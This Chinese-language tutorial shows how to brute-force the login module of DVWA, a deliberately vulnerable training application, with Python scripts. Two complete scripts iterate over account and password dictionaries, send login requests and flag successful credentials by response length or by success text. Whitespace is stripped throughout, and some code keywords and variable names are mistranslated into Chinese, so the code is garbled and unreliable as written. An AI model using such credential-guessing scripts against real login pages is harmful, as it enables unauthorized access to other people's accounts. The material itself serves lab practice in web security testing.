测试目标机器为DVWA,适用于DVWA中低级别暴力破解模块关键代码解释url指定url地址url="http://192.168.171.2/dvwa/vulnerabilities/brute/"headersetrequestheaderheader={'User-Agent':'Mozilla/5.0(WindowsNT10.0;WOW64;rv:46.0)Gecko/20100101Firefox/46.0','Cookie':'security=中号;PHPSESSID=geo7gb3ehf5gfnbhrvuqu545i7'}payloadsetrequestparameterspayload={'username':username,'password':password,"Login":'Login'}这一行的作用是发起get请求,接收响应信息通过变量ResponseResponse=requests.get(url,params=payload,headers=header)这两行代码循环遍历账号密码字典文件,然后给他们笛卡尔积循环暴力破解。这个方法和Burp的Intruder模块的Clusterbomb攻击方法一样foradmininopen("C:\\Users\\admin\\Documents\\dictionary\\account.txt"):forlineinopen("C:\\Users\\admin\\Documents\\dictionary\\password.txt"):然后将循环结果存入csv文件,数据用逗号隔开Response.status_code为响应的http状态码,len(Response.content)是http响应报文的长度result=str(Response.status_code)+','+username+','\+password+','+str(len(Response.content))f.write(result+'\n')完整代码方法1登录成功和失败返回数据不同,所以报文长度也不同。数据包长度与其他数据不同的数据可能是正确的账户密码。importrequestsurl="http://192.168.171.2/dvwa/vulnerabilities/brute/"#proxies={"http":"http://127.0.0.1:8080"}#代理设置,方便burp抓包和viewheader={'User-Agent':'Mozilla/5.0(WindowsNT10.0;WOW64;rv:46.0)Gecko/20100101Firefox/46.0','Cookie':'security=medium;PHPSESSID=bdi0ak5mqbud69nrnejgf8q00u'}f=open('result.csv','w')f.write('状态码'+','+'用户名'+','+'密码'+','+'数据包length'+'\n')foradmininopen("C:\\Users\\admin\\Documents\\dictionary\\account.txt"):forlineinopen("C:\\Users\\admin\\Documents\\dictionary\\password.txt"):username=admin.strip()password=line.strip()payload={'username':username,'password':password,"Login":'Login'}Response=requests.get(url,params=payload,headers=header)result=str(Response.status_code)+','+用户名+','\+密码+','+str(len(Response.content))f.write(result+'\n')print('\nComplete')runningresultrunning这是脚本发送的数据包。检查结果。数据包的长度与其他数据不同。登录测试方法二这种方法是根据登录成功的返回特征来判断是否正确。账号密码,然后将正确的账号密码输出到屏幕和txt文件中。主要变化在第17到20行。importrequestsurl="http://192.168.171.2/dvwa/vulnerabilities/brute/"#proxies={"http":"http://127.0.0.1:8080"}#代理设置,方便burp抓包查看header={'User-Agent':'Mozilla/5.0(WindowsNT10.0;WOW64;rv:46.0)Gecko/20100101Firefox/46.0','Cookie':'security=中等的;PHPSESSID=bdi0ak5mqbud69nrnejgf8q00u'}f=open('result.txt','w')foradmininopen("C:\\Users\\admin\\Documents\\Dictionary\\Account.txt"):forlinein打开("C:\\Users\\admin\\Documents\\Dictionary\\Password.txt"):username=admin.strip()password=line.strip()payload={'username':username,'password':password,"Login":'Login'}Response=requests.get(url,params=payload,headers=header)ifnot(Response.text.find('欢迎来到密码保护区')==-1):result=username+':'+passwordprint(result)f.write(result+'\n')print('\nComplete')运行结果
